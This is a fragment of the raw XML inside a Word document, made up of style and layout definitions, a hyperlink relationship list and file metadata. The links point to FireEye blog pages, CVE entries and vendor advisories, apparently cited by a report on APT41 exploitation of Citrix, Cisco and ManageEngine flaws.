    <w:name w:val="tagbutton"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00356DA3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00356DA3"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="type-xs">
    <w:name w:val="type-xs"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00356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807">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="550921030">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="270667644">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="5412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3507">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1824657692">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="16130552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reeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.citrix.com/article/CTX267679" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://srcincite.io/advisories/src-2020-0011/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-1652" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/mandiant/managed-detection-and-response.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/sarah-jones" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content.fireeye.com/apt-41/rpt-apt41/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/steventseeley/status/1235635108498948096?s=20" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.citrix.com/article/CTX267027" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-1653" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/frohoff/ysoserial" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/dan-perez" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-tags/apt" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/cap-christopher-glyer" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-10189" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-10189" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-tags/china" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.citrix.com/article/CTX267027" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-tags/vulnerabilities" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-19781" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://srcincite.io/pocs/src-2020-0011.py.txt" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content.fireeye.com/apt-41/rpt-apt41/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/cap-steve-mill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3850</Words>
  <Characters>21945</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>182</Lines>
  <Paragraphs>51</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>25744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 Miller</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Steven U. Miller</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-26T16:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-26T16:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>